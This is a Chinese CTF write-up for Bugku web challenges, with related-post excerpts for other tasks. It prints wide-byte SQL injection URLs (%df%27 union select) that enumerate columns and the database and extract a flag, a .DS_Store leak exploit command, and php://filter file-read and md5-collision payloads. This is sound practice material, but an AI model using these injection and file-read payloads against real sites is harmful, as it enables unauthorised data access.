bugku writeup web

阿新 • • 發佈：2019-02-05

sql注入

先可以通過burp來發現是gbk編碼，可以得知可能存在寬位元組注入

既然有提示，那麼就按照提示來

查詢key表,id=1的string欄位

構造payload

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from sql5.key%23

得到flag~~~~

有趣的是

http://103.238.227.13:10083/?id=1%df%27 union select 1,string from key where table_schema=database()%23
http://103.238.227.13:10083/?id=1%df%27

union select 1,string from key where table_schema=database() and table_name=key%23

這倆居然是爆不出來的= =

表非得是sql5.key，直接 from key是爆不出來的，所以得先爆出庫名

http://103.238.227.13:10083/?id=1%df%27 union select 1,database()%23

在此之前得先知道有幾列

http://103.238.227.13:10083/?id=1%df%27 order by 2%23

由此得出有兩列hhh

sql注入2

**
這題有點迷。。。。一上來就是登陸框，嘗試各種注入，無果。
參考了大牛們的部落格，才曉得是原始碼洩露

先了解些概念：

.DS_Store檔案洩漏
漏洞成因:
在釋出程式碼時未刪除資料夾中隱藏的.DS_store，被發現後，獲取了敏感的檔名等資訊。
漏洞利用:
http://www.example.com/.ds_store
注意路徑檢查
工具：
dsstoreexp
python ds_store_exp.pyhttp://www.example.com/.DS_Store

所以，直接cmd
這裡寫圖片描述

直接開啟web2目錄下的flag即可，得到flag~~~

bugku writeup web

sql注入先可以通過burp來發現是gbk編碼，可以得知可能存在寬位元組注入既然有提示，那麼就按照提示來查詢key表,id=1的string欄位構造payload http://103.238.227.13:10083/?id=

【Bugku】web基礎$_POST WriteUp

開啟題目沒有hint 那就開啟題目連結 http://123.206.87.240:8002/post/ 程式碼審計這段程式碼的意思是用what來接收提交的一段字元然後輸出what 如果what接收的值為flag 則輸出flag &n

Bugku ctf writeup--web進階-Bugku-cms1

Web進階---Bugku-cms1Step1:掃目錄(工具自備)分析掃描結果可以看到一個/data目錄看看裡面有什麼東西，訪問之後，發現一個sql檔案，下載下來檢視檔案中包含了使用者名稱和密碼，查詢一下admin，發現有兩個賬戶admin和admin888，密碼是md5加密

Bugku writeup（web篇）6【域名解析】

【域名解析】域名解析需要修改本機的hosts檔案，我們可以通過linux來完成題目通過管理員許可權，開啟hosts檔案如圖，將域名和ip新增至hosts檔案。然後直接訪問flag.bugku.com即可得到flag值

Bugku的web題目（多次）的解題

ima ech mar bre 除了也不能多次提示既然這道題目我弄了好久，最後問了朋友，然後在朋友的幫助下，將flag找到了這裏寫一下解題方法，記錄一下一進到這道題，看到了php?id=1，就很熟悉，很有可能是一道sql註入的題目，肯定是要試一下最簡單的測試

Bugku Writeup —檔案上傳2(湖湘杯)

我們先來看下題目，題目說明是檔案上傳我們可以嘗試通過構造payload來進行測試 php://filter/read=convert.base64-encode/resource=flag 獲取到flag，之後進行解碼，得到真正的flag 總結：題目考察的是檔案包含漏洞。

Bugku Writeup —文件上傳2(湖湘杯)

16px 文件分享 size 如果小夥伴 ase write 解碼我們先來看下題目，題目說明是文件上傳我們可以嘗試通過構造payload來進行測試 php://filter/read=convert.base64-encode/resource=fla

BUGKU CTF WEB (10-15題)

11、web5 點開網址後：隨便輸入提交看看：並沒有出現什麼，F12檢視程式碼，會發現一個奇怪的東西：百度以後發現是某種編碼，將其丟到控制檯出直接解碼，得到flag。 flag：ctf{whatfk} 12、頭等艙點開網址後：會發現如文字

速度要快 --- BugKu writeup

第一步：查看了原始碼，得到資訊—now you have to post the margin what you find！分析，需要一個帶margin屬性的post請求，猜測解題點應該再margin上面，而且需要構造請求第二步，檢視一下正常的請求頭，發現

CTF-練習平臺 writeup web

bugku Web WriteUp 剛剛接觸ctf沒多久，做ctf-練習平臺上的題目，有些新的題目，在網上沒有找到對應的writeup，所以做了之後就想自己寫一個，也順便理理自己的思路。（沒有太多經驗…可能對有些題目的理解還不深刻…）簽到題

南京郵電大學網路攻防平臺WriteUP——WEB（下）

21、Header開啟連結後顯示“什麼也沒有”檢視原始碼：無可用資訊，故轉換思路，使用burpsuite抓包來進行分析：抓到的包：傳送到repeater模組：單擊GO進行檢視Response相應：題目考察點：思路轉換絕處逢生！22、上傳繞過開啟連結：檢視原始碼：結合題目名

bugku web writeup（持續更新）

web2 開啟以後就長這樣，眼睛差點瞎掉不用想先F12一下先看到陰影部分了沒，對就是它。 =====================================================================

bugku-web 你從哪裡來 writeup

訪問題目連結，提示are you from google?，意思是我們得從goole進入使用Google,發現這是騙人的，還是得不到flag 抓包，然後修改referer欄位的值就此得到了

bugku-Web writeup md5 collision(NUPT_CTF)

訪問題目連結，得到提示input a,而題目是md5 collision,md5碰撞。所以找一個md5是oe開頭的值，get方式傳參過去，PAYLOAD 120.24.86.145:9009/md5.php?a=s878926199a 抓包，然後訪問得到

NJCTF2017 Web Writeup

獲取 ack 轉換運算符管理員 wid sel username 強制 -i 一個登陸和註冊的功能，開始以為是註入，發現並不行。後來嘗試了下弱口令 1 2 username:admin password:admin123 結果登錄成

Bugku-一段Base64-Writeup

pan logs 腳本沒有編碼格式 get lar .html 分數轉載請註明出處：http://www.cnblogs.com/WangAoBo/p/7207874.html bugku - 一段Base64 - Writeup 題目：分析：本來看到題

實驗吧web題（26/26）全writeup！超詳細:)

替換 current repl tex 括號註入重定向 urn 其他 #簡單的SQL註入 http://www.shiyanbar.com/ctf/1875 1)試著在?id=1,沒有錯誤 2)試著?id=1‘,出錯了，有回顯，說明有註入點： You have an

JarvisOJ平臺Web題部分writeup

hint 平臺 alt ade 文本 col 指定 iso linux PORT51 這道題本來以為是訪問服務器的51號端口，但是想想又不太對，應該是本地的51號端口訪問服務器想著用linux下的curl命令指定本地端口 curl --local-port 51 htt

Bugku—web—web3（wp）

0x00 前言這是Bugku中web中的web3的題目。 0x01 解題過程 1.點選這個網址，會出現一個介面，無論點選哪裡都關不掉。 2.考慮這是瀏覽器指令碼的設定因素，可以關閉你瀏覽器裡指令碼的在設定採用禁用。 3. 關閉指令碼後，再開啟網址，發現是一片空白，於

BUGKU_CTF WEB(21-35) writeUP

第21題：秋名山老司機根據題目要求可以看出題目要求在兩秒內計算出div標籤中給出的值。這裡採用py傳遞value引數。通過post傳遞引數。session保持會話，從而拿到flag。第22題：速度要快。 burp抓包發現一個response請求頭。裡面有一個flag屬性

bugku writeup web

sql注入

sql注入2

相關推薦